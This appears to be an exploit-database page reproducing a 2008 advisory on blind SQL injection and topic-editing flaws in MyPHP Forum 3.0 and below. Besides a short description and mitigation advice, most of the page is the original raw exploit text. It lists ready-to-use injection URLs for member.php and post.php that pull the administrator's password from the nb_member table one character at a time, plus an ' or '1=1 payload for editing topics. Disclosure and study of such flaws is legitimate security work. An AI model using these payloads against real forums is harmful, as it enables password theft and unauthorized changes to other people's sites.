header-logo
Suggest Exploit
vendor:
MyPHP Forum (Final)
by:
StAkeR
7.5
CVSS
HIGH
Blind SQL Injection and Edit Topics
89
CWE
Product Name: MyPHP Forum (Final)
Affected Version From: 3.0 and below
Affected Version To: 3.0 and below
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

MyPHP Forum (Final) <= 3.0 (Edit Topics/Blind SQL Injection) Remote Vulnerabilities

MyPHP Forum (Final) version 3.0 and below is vulnerable to Blind SQL Injection and Edit Topics. The vulnerability is present in the 'member.php' script when vulnerable parameters such as 'confirm', 'newconfirm', 'reqpwd' and 'post' are not sanitized properly. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The 'post.php' script is also vulnerable to Edit Topics. This can be exploited to inject arbitrary HTML and script code.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also be configured to use a least-privileged account with limited access to the database.
Source

Exploit-DB raw data:

/*
    -----------------------------------------------------------------------------------
    MyPHP Forum (Final) <= 3.0 (Edit Topics/Blind SQL Injection) Remote Vulnerabilities
    -----------------------------------------------------------------------------------
    Discovered By StAkeR[at]hotmail[dot]it
    Download On http://www.myphp.ws/
    

   - member.php (confirm - Blind SQL Injection)
   - member.php?action=confirm&id=' or ascii(substring((select password from nb_member where uid=1),1,1))=98/* 
 
   - member.php (newconfirm - Blind SQL Injection)
   - member.php?action=newconfirm&user=' or ascii(substring((select password from nb_member where uid=1),1,1))=98--
    
   - member.php?action=reqpwd  (reqpwd - Blind SQL Injection)
   - insert  ' or ascii(substring((select password from nb_member where uid=1),1,1))=98#
    
   - post.php (post Blind SQL Injection)
   - post.php?action=post&fid=1&tid=1&quote=' or ascii(substring((select password from nb_member where uid=1),1,1))=9%23
    
   - post.php (edit - Edit Topics)
   - post.php?action=edit&fid=1&tid=1&pid=[id topic] ' or '1=1
        
    
    
    
/*    

# milw0rm.com [2008-10-30]

Navigation

Suggest Exploit

Services By CQR